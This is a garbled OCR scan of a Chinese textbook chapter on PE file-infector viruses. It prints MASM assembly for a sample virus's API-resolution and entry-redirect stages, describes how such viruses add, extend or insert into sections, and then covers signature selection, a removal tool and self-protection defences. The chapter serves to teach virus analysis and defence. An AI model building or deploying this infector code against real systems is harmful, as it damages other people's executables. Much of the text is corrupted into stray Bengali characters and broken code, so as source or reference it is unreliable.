কেককককককককককককককককককককককক কককককককককককককককককককককককককক কক কককককককককককক ক কক 
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; 查找 符合 名 称 的 导出 函数 名 
[েশকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov ebx. [esi].AddressOfNames 

add ebx,  hModule 

Xor edx, edx 

repeat 

push esi 

mov edi, [ebx] 

add edi, hModule 

mov esi _IpszApi 

mov ecx, (QdwStringLength 

repz cmpsb 

if | ZERO? ; 判断 ZF 是 否 为 0 
pop esi 

jmp @F 

„endif 

pop esi 

add ebx, 4 

inc edx 

until edx >= [esi]. NumberOfNames 

jmp _Error 

@@: 

2 ককসসফফকসকককসকসকসককসফসককসফসককসককককসফককসসকসসসকফফককফফসকক 
:API 名 称 索引 --> 序号 索引 — 地 址 索引 
2 কসকসককফফকসফসকককফসকককফসককফসককসফসককসকককসককসসসকসফসকফফবসফসকক 
sub ebx. [esi].AddressOfNames 

sub ebx, _hModule 

shr ebx, 1 

add ebx, [esi].AddressOfNameOrdinals 
add ebx,  hModule 

movzx eax, word ptr [ebx] 

shl eax, 2 

add eax, [esi].AddressOfFunctions 

add eax,  hModule 


কেফফককক কক কক ক ক কক ক কককক কক কক ক কক ক ককককক কক ক কক কক ক কক ক কক কক কককক কক কক ক কক কক ক কক ক 


: 从 地 址 表 得 到 导出 函数 地 址 
কেকককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
mov eax, [eax] 

add eax, _hModule 

mov @dwRetum, eax 

 Ermor: 

pop চি] 

add esp. Och 

assume esi: nothing 


popad 
mov eax @dwRetum 
ret 


_GetApi endp 
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ID 


; 一 些 API 函数 的 原形 定义 ， 在 程序 中 要 用 到 


:৯৯৯৯৯১৯১৯৯৯৯৯৯৯৯১৯১৯৯৯৯৯৯৯৯১৯৯৯৯১৯৯৯৯৯১৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯৯ 


. ProtoFindFirstFile 
. ProtoFindNextFile 
. ProtoFindClose 

. ProtoSetEndOfFile 
. ProtoGetProcAddress 
. ProtoLoadLibrary 
. ProtoMessageBox 
. ProtoDeleteFile 

. ProtoCreateFile 
dword, :dword 

. ProtoReadFile 

. ProtoWriteFile 

. ProtoSetFilePointer 
. ProtoCloseHandle 
. ProtoDeleteFile 

. ProtoGetFileSize 

. ProtoCopyFile 

. ProtoGlobalAlloc 

. ProtoGlobalFree 

. ProtoOpenProcess 


typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 


typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 


_ProtoReadProcessMemory typedef 


:dword, :dword 


. ProtoWriteProcessMemory typedef 


:dword,:dword 

. ProtoCreateThread 

. ProtoExitProcess 

. ProtoGetModuleHandle 
. ProtoGetModuleFileName 
. ProtoRtlZeroMemory 

. Protolstrcpy 

. Protolstrcat 

; Protolstrcpyn 

. Protolstrlen 

. Protolstremp 


. ProtoShellExecute 
. Protowsprintf. 


typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 
typedef 


typedef 
typedef 


proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 


proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 


proto 


proto 
proto 
proto 
proto 
proto 
proto 
proto 
proto 


proto 


:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 


:dword 
:dword 
:dword 
:dword 
:dword 
:dword, 
:dword, 
:dword, 
:dword 
:dword, 
:dword, 


:dword, 


:dword, 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 
:dword 


:dword 


:dword 


:dword 


:dword 


:dword 


:dword 


:dword 
:dword 


:dword 
:dword, 
:dword 


:dword, 
:dword, 


:dword, 
:dword, 
dword, 

:dword 
:dword 
:dword 


:dword 


:dword 


:dword, 


:dword, 


:dword, 


:dword, 
:dword, 


:dword 


:dword 


:dword, 


:dword\ 


:dword, 


:dword 


:dword 


:dword 


:dword, :dword V 


:dword， :dword 


:dword， :dword 


:dword 


:dword, :dword 


:dword :dword :dword :dword :dword :dword 


c :dword. 


:Vararg 
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; 建立 一 个 


新 类 型 ， 实 际 为 函数 的 地 址 


_ApiFindFirstFile typedef ptr . ProtoFindFirstFile 
 ApiFindNextFile typedef ptr . ProtoFindNextFile 
 ApiFindClose typedef ptr _ProtoFindClose 
_ApiSetEndOfFile typedef ptr . ProtoSetEndOfFile 
. ApiGetProcAddress typedef ptr . ProtoGetProcAddress 
. ApiLoadLibrary typedef ptr _ProtoLoadLibrary 
_ApiMessageBox typedef ptr _ProtoMessageBox 
_ApiCreateFile typedef ptr _ProtoCreateFile 
_ApiReadFile typedef ptr _ProtoReadFile 
_ApiWriteFile typedef ptr _ProtoWriteFile 
_ApiSetFilePointer typedef ptr _ProtoSetFilePointer 
_ApiCloseHandle typedef ptr _ProtoCloseHandle 
;_ApiDeleteFile typedef ptr _ProtoDeleteFile 
_ApiGetFileSize typedef ptr _ProtoGetFileSize 
_ApiCopyFile typedef ptr _ProtoCopyFile 
_ApiGetFileSize typedef ptr _ProtoGetFileSize 
_ApiGlobalAlloc typedef ptr _ProtoGlobalAlloc 
_ApiGlobalFree typedef ptr _ProtoGlobalFree 
_Apilstrlen typedef ptr _Protolstrlen 
_FindFirstFile _ApiFindFirstFile ? 
_FindNextFile _ApiFindNextFile ? 
_FindClose _ApiFindClose ? 
_CreateFile _ApiCreateFile ? 
_ReadFile _ApiReadFile + 
_ WriteFile _ApiWriteFile 7 
. SetFilePointer  ApiSetFilePointer — ? 
. CloseHandle . ApiCloseHandle ? 
_GetFileSize _ApiGetFileSize 2 
. GlobalAlloc . ApiGlobalAlloc 7 
. GlobalFree . ApiGlobalFree T 

° 


_ExitProcess _ApiExitProcess 


: 要 用 到 的 函数 的 名 称 ， 由 LoadLibrary 使 用 


szFindFirstFile 


db 'FindFirstFileA'.0 
szFindNextFile db ”FindNextFileA'.0 :无 字符 串 参数 ， 也 要 标 A 
szFindClose db 'FindClose'.0 
;szSetEndOfFile db 'SetEndOfFile'.0 
szCreateFile db 'CreateFileA'.0 
szReadFile db 'ReadFile'.0 
szWriteFile db 'WriteFile'.0 
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szSetFilePointer db 'SetFilePointer.0 
szCloseHandle db 'CloseHandle'.0 
szGlobalAlloc db  'GlobalAlloc'.O 
szGlobalFree db 'GlobalFree'.0 
szGetFileSize db 'GetFileSize'.0 
SzExitProcess db 'ExitProcess'.0 

; 计算 按照 指定 值 对 齐 后 的 数值 

@Align2 proc dwSize, dwAlign 

222 ; BUTEA, 408A 

@Align? endp 

@ProcessPeFile3 proc f Name :f Name 为 被 感染 文件 
টার ; WHEA, A 
@ProcessPeFile3 endp 


aE ok 


:感染 病毒 后 新 的 入 口 地 址 ， 病 毒 从 此 处 开始 运行 


কেককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককককক 
_NewEntry: 
কেককককককককককককককককককককসকককককককককককককককককককককককককককককককককককককককককককককক 


; 重 定位 并 获取 一 些 API 的 入 口 地 址 


EREEREER EEE EEEE EEEE EEEE EEE EEEE EEEE কক কককক কক ককফ কক কক কক কক কক কক ক ক ক কক কক কফ ক কক 


call @F : 跳 转 到 下 面 的 第 一 个 标号 
@@: 
pop ebx 


sub ebx, offset @B 
কফসকসসফসককসফসককফকককফসককসফককসসকককসসককফফসকফসককসফকসসফসফফবককফক 
invoke — GetKemelBase, [esp] :获取 Kernel32.dll 基 址 

if !eax :失败 则 返回 原 程序 入 口 地 址 

jmp _ToOldEntry 

„endif 

; 得 到 Kemel32.dll 的 基地 址 

mov [ebx+hDIIKermnel32]. eax 

lea eax, [ebx+szGetProcAddress] 

invoke — GetApi.[ebx+hDIIKernel32] eax :获取 GetProcAddress 函数 入 口 
if !eax 

jmp _ToOldEnty = :失败 则 返回 原 程序 入 口 地 址 

„endif 

mov [ebx+ GetProcAddress]. eax 

; 获取 LoadLibrary 函数 入 口 

lea eax, [ebx+szLoadLibrary] 

invoke [ebx+ GetProcAddress]. [ebx--hDIIKernel32]. eax 

mov [ebx+ LoadLibrary]. eax 

:下 面 通 过 LoadLibrary 和 GetProcAddress 获取 要 用 到 的 Kernel32.dll 中 函数 
: 调用 GetProcAddress 获取 CreateFile 地 址 

lea eax, [ebx+szCreateFile] 
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invoke [ebx+ GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ CreateFile]. eax 

:调用 GetProcAddress 获取 ReadFile 地 址 

lea eax, [ebx+szReadFile] 

invoke [ebx+ GetProcAddress]. [ebx+hDIIKernel32]. eax 
mov [ebx+ ReadFile].eax 

;调用 GetProcAddress 获取 WriteFile 地 址 

lea eax, [ebx*szWriteFile] 

invoke [ebx+ GetProcAddress]. [ebx--hDIIKernel32], eax 
mov [ebx+ WriteFile]. eax 

;调用 GetProcAddress 获取 SetFilePointer 地 址 

lea eax, [ebx+szSetFilePointer] 

invoke [ebx+ GetProcAddress], [ebx--hDIIKemel32], eax 
mov [ebx+ SetFilePointer], eax 

;调用 GetProcAddress 获取 CloseHandle 地 址 

lea eax, [ebx+szCloseHandle] 

invoke [ebx-- GetProcAddress], [ebx+hDIIKemel32], eax 
mov [ebx+ CloseHandle], eax 

;调用 GetProcAddress 获取 GetFileSize 地 址 

lea eax, [ebx*szGetFileSize] 

invoke [ebx-- GetProcAddress], [ebx--hDIIKemrnel32]. eax 
mov [ebx+ GetFileSize]. eax 

;调用 GetProcAddress 获取 GlobalAlloc 地 址 

lea eax, [ebx*szGlobalAlloc] 

invoke [ebx-- GetProcAddress], [ebx--hDIIKemrnel32]. eax 
mov [ebx-- GlobalAlloc], eax 

:调用 GetProcAddress 获取 GlobalFree 地 址 

lea eax, [ebx+szGlobalFree] 

invoke [ebx+ GetProcAddress]. [ebx--hDIIKernel32]. eax 
mov [ebx+ GlobalFree]. eax 

调用 GetProcAddress 获取 ExitProcess 地 址 

lea eax.[ebx+szExitProcess] 

invoke [ebx+ GetProcAddress]. [ebx+hDIIKemel32]. eax 
mov [ebx+ ExitProcess].eax 

:调用 GetProcAddress 获取 FindFirstFile 

lea eax, [ebx+szFindFirstFile] 

invoke [ebx+ GetProcAddress]. [ebx-hDIIKernel32]. eax 
mov [ebx+ FindFirstFile], eax 

;调用 GetProcAddress 获取 FindNextFile 

lea eax, [ebx*szFindNextFile] 

invoke [ebx* GetProcAddress]. [ebx--hDIIKemel32], eax 
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mov [ebx+ FindNextFile]. eax 

:调用 GetProcAddress 获取 FindClose 

lea eax, [ebx+szFindClose] 

invoke [ebx+_GetProcAddress], [ebx+hDIIKemel32]. eax 
mov [ebx+ FindClose]. eax 

:提示 已 经 感染 

lea ecx.[ebx+szText1] 

lea eax, [ebx+szCaption] 

invoke [ebx+_MessageBox], NULL, ecx, eax, MB_OK 
call @SearchFile2 


কেকককককককককককককককককককককককককককককককফকককককককককককককককককককককককককককককককককককক 


; 跳 到 原 程序 入 口 地 址 ， 执 行 原来 代码 


_ToOldEntry: 
db 0e9h :0e9h 是 jmp 的 机 器 吗 

:_dwOldEntry=( 原 来 的 入 口 RVA 地 址 -jmp xxx 下 条 指令 的 RVA 地 址 ) 
 dwOldEntty dd 44332211h :用 来 填 入 原来 的 入 口 地址 
APPEND CODE END equ $ :病毒 代码 结束 

从 病毒 代码 分 析 可 知 ， 病 毒 代码 的 执行 过 程 为 : 获取 kemel32.dll 地 址 一 获取 
LoadLibrary 和 GetProcAddress 地 址 一 获取 要 用 到 的 函数 的 地 址 一 显示 信息 提示 对 话 框 提 示 
被 感染 一 搜索 本 目录 下 可 感染 文件 一 感染 exe 文件 --> 跳 转 到 原来 程序 执行 。 

每 个 调用 的 函数 在 其 地 址 的 基础 上 都 加 了 ebx， 其 原因 在 本 章 前 面 的 内 容 已 经 论述 。 
寄存 器 ebx 的 值 在 入 口 程序 的 前 两 条 指令 获取 。 对 程序 中 的 全 局 变量 ， 包 括 API 函数 ， 计 
算 其 地 址 时 都 需要 加 ebx。 而 对 局 部 变量 ， 并 不 需要 加 ebx， 因 为 它们 存放 在 堆栈 段 。 

最 后 的 一 条 指令 跳 转 到 原 程序 入 口 地 址 。 dwOldEntry 初始 化 为 44332211 主要 是 方便 
测试 。0e9h 为 jmp 指令 机 器 码 。 设 原来 程序 的 入 口 地 址 为 xxxxxxxx， 当 前 指令 的 eip(eip 
总 是 指向 下 条 要 执行 的 指令 地 址 ) 为 jmp _dwOldEntry 指令 的 下 条 指令 的 偏 移 地 址 ， 也 就 是 
WA offset _ToOldEntry+5。 那 么 ， 程 序 生 成 后 ，_dwOldEntry 需要 修改 ， 计 算 方法 为 : 

. dwOldEntry = xxxxxxxx — (offset. ToOldEntry--5) 

在 本 例 ，xxxxxxxx 为 @dwEntry。 如 果 把 这 部 分 代码 附加 到 一 个 程序 后 面 ， 则 : 

mov eax, [ecx].VirtualAddress ” :病毒 节 虚拟 地 址 -->eax 该 指令 的 eip 
add eax, (offset _ToOldEntry - offset APPEND CODE+5) 

此 处 的 eax 就 是 (offset _ToOldEntry+5)。 反 汇编 感染 后 的 Insert.exe， 可 以 看 到 最 后 的 

指令 如 图 3-11 所 示 。 
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[EUR Soft W32Dasm Ver 10 Program Disassembler /Debugger 
Disassembler Edi Project Debug Search Goto Execute Text Functions HexData Refs Help 


exl [e«t PaE 
Disassembly of File: Insert.exe 

Code Offset = 00001000, Code Size = 00001000 

Data Offset = 00003000, Data Size = 00001000 

Number of Objects = 0005 (dec), Imaqebase = 00400000h 
Object01:.text RVA: 00001000 Offset: 1000 Size: 1000 Flags: 60000020 
Object02:.rdata RVA: 00002000 Offset: 2000 Size: 1000 Flags: 40000040 
Object03:.data RVA: 00003000 offset: 3000 Size: 1000 Flags: C0000040 
Object04:.rsre RVA: 00004000 Offset: 4000 Size: 1000 Flags: 40000040 
[নিউ ইউ 5000 Size: 1000 Flags: E0000020 

//৮**৮৮৯১৯৯১৯১১৯২৩১৯ program Entry Point ****++++ 

:004055c1  E800000000 1551100405555 :0১77%21:) 


100405780  ESSEBFFFFF omp 00402339 (FRAN) 
图 3-11 反 汇 编 Insert.exe 
可 以 看 到 ， 指 令 中 多 了 一 个 节 “.SD-1”， 入 口 地 址 为 0x004055C6， 可 以 对 比 图 3-10 


进行 观察 ， 最 后 的 指令 为 jmp 00401730。 从 图 3-9 可 以 看 到 被 感染 前 的 入 口 地 址 RVA 为 
0x1730, 与 内 存 基地 址 00400000h( 见 图 3-10) 相 加 ， 正 好 是 0x00401730， 即 原 程序 入 口 地址 。 


2. 加 长 最 后 一 节 修 改 PE 


该 方式 将 病毒 附加 在 最 后 一 节 ， 同 时 修改 最 后 一 节 的 节 表 结构 ， 修 改 程序 入 口 地 址 ， 
使 指向 最 后 一 节 的 病毒 代码 。 原 理 图 如 图 3-12 所 示 。 


AddressOfEntryPoint 2 AddressOfEntryPoint 


图 3-12 修改 节 


可 以 看 到 ， 节 的 个 数 没有 增加 ， 但 最 后 的 一 个 节 变 长 了 ， 最 后 的 一 个 节 表 结构 也 被 修 
改 ， 以 描述 新 的 节 。PE 头 被 修改 ， 入 口 地 址 被 指向 最 后 的 节 。 

病毒 对 搜索 到 的 文件 感染 过 程 为 : 以 可 读 可 写 方式 打开 文件 一 > 读 文 件 入 内 存 一 > 分 析 
是 否 为 PE 文件 一 > 是 ， 则 修正 一 些 PE 头 部 的 内 容 一 > 修改 最 后 节 的 节 表 结构 一 > 向 内 存 文 
件 最 后 节 尾 写 入 病毒 代码 一 > 分 析 是 否 感染 过 (最 后 节 名 为 .SD-2) 一 > 修改 节 名 一 > 修改 入 口 
地 址 一 > 覆盖 原文 件 一 > 修改 由 病毒 到 原 入 口 的 跳 转 指令 一 > 考虑 文件 对 齐 补 齐 文件 。 

有 什么 简单 的 方法 可 拒绝 这 种 修改 文件 的 方式 呢 ? 把 最 后 节 名 改 为 .SD-2 能 欺骗 病 
毒 么 ? 
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3. 插入 节 方 式 修改 PE 
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这 种 方式 不 增加 节 的 个 数 和 文件 的 长 度 , 病毒 搜寻 到 一 个 可 执行 文件 后 , 分 析 每 个 节 ， 
查询 节 的 空白 空间 是 否 可 以 容纳 病毒 代码 ， 若 可 以 ， 则 感染 之 。CIH 就 是 采用 该 种 方式 感 


AddressOfEntryPoint 


3-13 ”插入 节 感 染 


先 来 看 一 个 感染 了 “SD-3” 号 病毒 的 例子 。 如 图 3-14 所 示 的 是 文件 aaa.exe 在 感染 前 
后 的 文件 大 小 没有 变化 ， 但 执行 时 多 出 一 个 信息 提出 对 话 框 ， 如 图 3-15 所 示 。 


(aaa. exe 感 染 前 ) 

716 应 用 程序 
bb exe 96 应 用 程序 
0০৩০] 99 应 用 程序 

Y 2019 应 用 程序 
È) PEVirus_3,asm 54KB ASM 文件 
回 pewrus_ 3.exe 9KB ”应 用 程序 

(aaa. exe 感 染 后 ) 

F'lsaa,exe 7KB 应 用 程序 
Ebbb.exe 9KB 应 用 程序 
加 ccc.exe 9KB 应 用 程序 
BB insert exe 2016 应 用 程序 
[Ë] PEVirus 3.asm 54KB ASM 文件 
E'PEvrus_3.exe | 916 应 用 程序 


图 3-14 感染 前 后 对 比 


Icon & Bitmap X 


E 212 
==] 


图 3-15 感染 前 后 执行 


升 达 经 贸 管理 学 院 资讯 条 x 


该 程序 已 经 感染 了 5D-3 病 毒 


8 
会 目 动感 染 该 目录 下 一 个 文件 


2005-5-26 10;00 
2005-5-26 14;39 
2005-5-26 14;40 
2005-4-19 13;59 
2005-6-18 13:00 
2005-6-18 13:00 


2005-8-23 8:51 

2005-5-26 14:39 
2005-5-26 14:40 
2005-4-19 13:59 
2005-6-18 13:00 
2005-6-18 13:00 


mm | 


先 用 exe 分 析 工 具 分 析 感 染 前 的 文件 结构 ， 如 图 3-16 所 示 。 从 第 1 节 可 看 到 ， 实 际 长 
度 为 Ox3A 字 节 ， 实 际 占用 空间 0xA00 字 节 ， 空 余 长 度 0xA00-0x3A 字 节 ， 只 要 病毒 长 度 


小 于 这 个 值 ， 病 毒 就 可 以 将 自身 写 入 该 位 置 。 
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再 来 看 感染 后 的 结构 ， 如 图 3-17 所 示 。 显 示 长 度 仍然 是 0x1A00， 比 较 两 个 图 ， 可 以 
看 到 感染 后 入 口 RVA 由 原来 的 0x1000 ÆT 0x358D。 据 推算 ，0x1000 在 第 1 节 内 ， 而 
0x358D 在 最 后 一 节 内 。 最 后 一 节 的 节 名 变 成 了 “.SD-3”， 节 的 实际 大 小 变 成 0x7EB 字 节 ， 
则 病毒 长 度 为 0x7EB-0x3A 字 节 。 

经 分 析 得 出 ， 病 毒 的 感染 流程 为 : 以 可 读 可 写 方式 打开 文件 一 分 配 内 存 一 读 文件 到 内 
存 一 是 PE 文件 么 ? 一 是 ， 则 遍历 每 个 节 一 存在 能 容纳 病毒 的 空白 空间 么 ? 一 是 ， 感 染 过 
了 么 ( 节 名 为 .SD-3)? 一 是 ， 修 改 节 名 、PE 头 、 节 表 结 构 一 插入 病毒 。 

思 


如 果 室 白 室 间 不 够 ， 会 怎样 ? 


1 text 文件 偏 移 =1A8H DOs 头 分 析 
pr E pesi 
7 3919৮ লসর 
রান 1008 আনা 
iir anay xj 5S 
Eur m lata PL Ld 

dne f 妆 件 长度 -1A00 SEE taco 

3 展 Ex Ti =A00H নাঃ inj 
BERE Stier E dono 


3-16 ”感染 前 结构 


1 Bieten 文件 偏 移 =1A8H 
1 =764H 
16 

1 ub isle -anot 

1 00020H 


ER ;.rdata 文件 偏 移 =1DOH 
的 六 ES 

HE 间 大 小 =400H 
=40000040H 


A 
fe | pur 
xd 


zd 文件 长 度 =1A00 实 读 长 度 =1A00 


内 
P ctn 属性 查 训 
58000090608 a] 
WA: 0x 358D 
2 映像 尺寸 :0x 4000 


图 3-17 感染 后 结构 
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针对 前 面 的 “SD-3” 病 毒 ， 设 计 如 图 3-18 专 杀 软件 。 因 为 “SD-3” 只 感染 扩展 名 为 
exe 的 文件 ， 程 序 先 扫描 进程 虚拟 内 存 ， 寻 找 有 特征 码 的 进程 ， 有 则 杀 掉 该 进程 ， 并 清除 
进程 对 应 的 文件 中 的 病毒 。 然后 枚 举 逻 辑 磁盘 , 分析 每 个 文件 中 是 否 含 特征 码 ， 有 则 清除 。 
完整 程序 见 “ 磁 盘 扫 描 并 清除 SD-3 病毒 ”下 载 的 实例 源 程序 中 。 


3.3.1 清除 病毒 原理 


最 简单 的 清除 方法 是 将 程序 的 入 口 地 址 由 现在 的 指向 病毒 改 为 指向 原来 入 口 ， 但 病毒 
代码 还 保存 在 程序 体内 。 最 好 的 办 法 是 恢复 原来 入 口 地 址 , 将 病毒 代码 部 分 用 数据 0 覆盖 。 
完整 程序 见 “ 磁 盘 扫 描 并 清除 SD-3 病毒 ”。 


DEUX 


ET Snew\aaa. exe | 
ZI SnewWbb. exe 
ET -3new\ccc. exe 


Earth: FS\ 工 具 \ 原 代码 Win2000 滋 出 \OverFlowNResource.h 
# | 保存 结果 | 退出 | 


图 3-18 专 杀 软 件 


1. 如 何 确定 特征 码 
特征 码 是 标识 病毒 的 唯一 数据 串 ， 在 其 他 文件 中 无 法 找到 。 特 征 码 比较 长 ， 则 定位 病 
毒 准确 ， 但 匹配 速度 慢 。 特 征 码 太 短 ， 则 匹配 速度 快 ， 但 可 能 误杀 。 选 择 如 图 3-19 所 示 方 
框 中 的 数据 为 特征 码 。 理 由 是 ， 其 他 文件 中 不 含 该 数据 串 ， 只 有 该 病毒 中 有 ; 其次， 该 数 
据 串 前 面 的 5 个 字 节 为 原来 的 入 口 地 址 。 特 征 码 用 VirusChar 表示 。 
BYTE VirusChar[15]=(0x55.0x8b.0xec.0x81.0xc4.0xb8. 0xfe.0xff.0xff.0x60.0xb0.0x2a, 
Ox88.0x45.0xfa): /病毒 特征 码 


2. 获取 原来 入 口 地 址 

因为 不 知道 原来 可 执行 文件 的 头 结构 ， 因 此 无 法 完全 恢复 。 只 能 清除 病毒 ， 使 原来 程 
序 正常 执行 。 

计算 原来 入 口 地 址 的 方法 为 , 从 特征 码 向 前 取 4 字 节 , 如 图 3-19 则 是 “A2 D8 FF FF”, 
转换 为 16 HÑ) DWORD, 则 是 0xFFFFD8A2。 设 当前 特征 码 的 文件 偏 移 为 fpff， 转 换 为 内 
存 偏 移 mOff， 分 析 节 结构 ， 得 到 该 节 的 相对 虚拟 地 址 RVA 为 rr， 计 算 方式 为 : 


mOff =rv+fOff % FileAlignment +ImageBase 
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则 从 图 3-19 看 出 ,特征 码 的 文件 偏 移 为 0x175E, FileAlignment 为 0x200, Section- 
Alignment 为 0x1000, ImageBase 为 0x400000， 那 么 内 存 地 址 为 : 


mOff = 0X3000+0x175e%0x200+0x400000=0x40375e 
那么 计算 出 原来 的 相对 入 口 地址 为 : 

0x40375e — 0x400000 + 0x0xFFFFD8A2 = 0x1000 
3. 如 何 清除 病毒 


(1) 修改 PE ১ 

将 入 口 地 址 AddressOfEntryPoint 恢复 为 原来 的 值 ， 如 图 3-19 则 是 0x1000。 

(2) 修改 病毒 节 表 

将 节 的 名 字 Name 由 “SD-3” 修 改 为 其 他 任意 字符 串 。 

将 节 区 的 实际 尺寸 VitualSize 修改 为 特征 码 开 始 相 对 偏 移 减 去 节 的 内 存 偏 移 得 到 的 
值 。 如 图 3-19 则 是 0x375E-0x3000， 即 0x75E。 

(3) 覆盖 病毒 代码 

将 从 特征 码 前 5 个 字 节 开始 的 空间 到 本 节 最 后 的 字 节 空间 全 部 用 数据 0 Run. Anf 
3-19， 则 是 文件 偏 移 0x1000-0x1000+0x7EB-1. 


FileAlignment 
SectionAlienment 


TEBh 
A00h， 节 的 属性 =E0000060h 


3719 寻找 特征 码 
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3.8.0 ”清除 病毒 实现 
下 面 代码 包 括 磁盘 文件 搜索 、 可 执行 文件 分 析 、 比 对 特征 码 、 修改 可 执行 文件 清除 病毒 。 


1. 界面 设计 
程序 的 主线 程 负责 过 程 与 结果 的 显示 。 子 线程 负责 内 存 进程 和 文件 的 扫描 与 分 析 并 清 
除 病毒 。 
界面 的 控件 有 : 
CStatic m Static; /提示 正 扫描 的 文件 
CListBox m List: /显示 扫描 结果 
CButton m Bstart: /扫描 开始 按钮 
CString m Disk: /列举 本 机 的 逻辑 驱动 器 
2. 列举 逻辑 驱动 器 


使 用 函数 GetLogicalDrives 实现 。 该 函数 的 返回 值 每 位 对 应 一 个 驱动 器 。 
3. 扫描 磁盘 文件 


使 用 函数 FindFirstFile、FindNextFile、FindClose 和 结构 WIN32 FIND DATA 实现 。 
由 于 搜索 所 有 文件 ， 结 构 WIN32 FIND DATA 设置 的 过 滤 条 件 是 “*.*”。 如 果 发 现 了 文 
件 ， 则 调用 文件 处 理 函数 ， 如 果 是 子 目 录 ， 则 使 用 递归 ， 进 入 子 目 录 。 

4. 扫描 进程 虚拟 内 存 

扫描 过 程 为 :列举 进程 一 打开 进程 一 获取 进程 对 应 的 文件 一 读 文 件 是 否 有 特征 码 一 若 
有 ， 则 终止 进程 。 

扫描 使 用 到 的 主要 函数 有 : OpenProcess( 打 开 进 程 )，TerminateProcess( 终 止 进程 )， 
EnumpProcesses( 枚 举 进 程 )，EnumProcessModules( 返 回 指定 进程 所 有 模块 的 句柄 的 引用 )， 
GetModuleFileNameEx( 获 取 进 程 的 全 路 径 文件 名 )，ReadProcessMemeory( 读 进程 内 存 )。 


3.4 HR PE 结构 防 病毒 


前 面 章节 已 经 讨论 过 3 种 感染 方式 ， 本 节 的 目的 就 是 针对 3 种 感染 方式 打造 不 依靠 杀 
毒 软件 ， 而 依靠 程序 本 身 自 我 防 病毒 的 能 力 。 
3.4.1 自 免疫 防 病毒 原理 

下 面 针 对 3 种 病毒 感染 方式 分 别论 述 。 

1. 对 于 第 一 种 病毒 

对 于 第 一 种 病毒, 采用 移动 PE 头 的 方式 防止 病毒 新 建 节 表 和 节 , 其 原理 描述 如 图 3-20 
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所 示 。 


0093৮ 0053 


e_lfanew 7 e_lfanew 
rm EN 

RIW* esm > | PE 
Em . 


(ZAR) 最 后 节 表 
EI RIT, 
最 后 节 最 后 节 


图 3-20 移动 PE 3k 


先 看 上 节 的 图 3-5， 最 后 一 节 的 节 表 结构 的 文件 偏 移 为 08250， 考 虑 其 长 度 0x20， 为 
0x270。 而 第 一 节 的 文件 偏 移 为 0x1000， 也 就 是 说 在 最 后 的 节 表 结构 与 第 一 节 之 间 存 在 足 
够 大 的 空间 让 病毒 新 建 大 小 只 有 0x20 的 病毒 节 表 结构 。 可 是 ， 定 位 PE 头 开始 位 置 的 是 来 
Á DOS 头 中 的 一 个 字段 e lfanew， 该 字段 为 DWORD 类 型 。 若 修改 e Ifanew 的 值 ， 同 时 
将 PE 头 下 移 ， 让 最 后 节 表 和 第 一 节 之 间 无 空白 区 域 ， 就 可 以 欺骗 该 种 病毒 ， 使 其 以 为 无 
空间 了 。 

其 算法 步骤 是 : 

(1) BEN PE 头 结构 ， 得 到 节 区 个 数 (用 NumberOfSections 表示 )。 

(2) 分 配 缓冲 区 (用 psection header 表示 )， 将 所 有 节 表 读 到 缓冲 区 。 

(3) 计算 移动 到 的 文件 偏 移 。 

移动 数据 的 长 度 为 PE 头 结构 大 小 (sizeof(IMAGE NT_HEADERS)) 加 上 所 有 节 表 结构 
的 大 小 为 (sizeof(IMAGE SECTION_HEADER)*nt_ headerFileHeaderNumberOfSections)。 移 
动 到 的 位 置 为 第 一 节 区 的 文件 偏 移 (psection_header[0].PointerToRawData) 减 去 移动 数据 的 
长 度 。 将 缓冲 区 数据 写 入 文件 该 位 置 。 

(4) 修改 DOS 头 结构 字段 e lfanew， 并 将 该 结构 重新 写 入 文件 的 原 位 置 。 

2. 对 于 第 二 种 病毒 


用 CRC(Cyclic Redundancy Check) 32 位 校 验方 式 对 付 。 CRC 用 来 检验 一 段 数据 是 否 被 
修改 ， 如 果 采 用 前 面 介绍 的 病毒 修改 exe 文件 技术 ， 修 改 一 个 可 执行 文件 ， 让 程序 自我 求 
取 当 前 文件 的 CRC 值 ， 然 后 再 与 预先 存在 文件 当中 的 CRC 值 进行 比较 ， 相 等 则 运行 原来 
代码 ， 和 否则 用 备份 文件 覆盖 当前 程序 ， 然 后 在 运行 。 

对 重要 文件 进行 备份 ， 在 Windows 2000 以 后 被 大 量 使 用 ， 例 如 ， 可 以 在 系统 目录 下 
搜索 以 下 关键 文件 kemel32.dll， 可 以 看 到 备份 ， 删 除 一 个 ， 就 会 用 另 一 个 文件 恢复 。 

可 是 程序 是 不 能 自己 用 别 的 文件 来 覆盖 自己 的 ， 这 里 采用 的 办 法 是 ， 在 程序 内 部 有 一 
个 用 汇编 写 的 自我 修复 程序 ， 很 小 ， 不 足 3KB。 当 检测 到 校 验 值 不 相等 ， 程 序 就 将 该 修复 
程序 释放 ， 并 执行 ， 而 当前 程序 退出 。 由 修复 程序 获取 需 保护 的 程序 和 备份 程序 全 路 径 ， 
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然后 用 备份 覆盖 需 保护 的 程序 文件 ， 然 后 重新 执行 。 恢 复 后 修复 程序 已 经 成 为 多 余 ， 但 它 
也 不 能 自我 删除 ， 它 生成 一 个 批 处 理 文件 并 执行 它 ， 然 后 退出 。 由 批 处 理 文件 来 删除 它 ， 
最 后 批 处 理 文件 自我 删除 。 试 验证 明 ，exe 文件 的 进程 不 能 自我 删除 ,扩展 名 为 bat 的 批 处 


理 文件 可 以 自我 删除 。 


被 保护 程序 运行 过 程 如 图 3-21 所 示 ， 修 复 程序 运行 过 程 如 图 3-22 所 示 ， 批 处 理 程序 


运行 过 程 如 图 3-23 所 示 。 


ERREF 
保护 程 Noj 
1521 

৬:০5 退出 

释放 修复 程序 | [E 调用 备份 覆盖 Í 
程 
৪ — 执行 批 处 理 文件 

执行 修复 程序 调用 备份 覆盖 

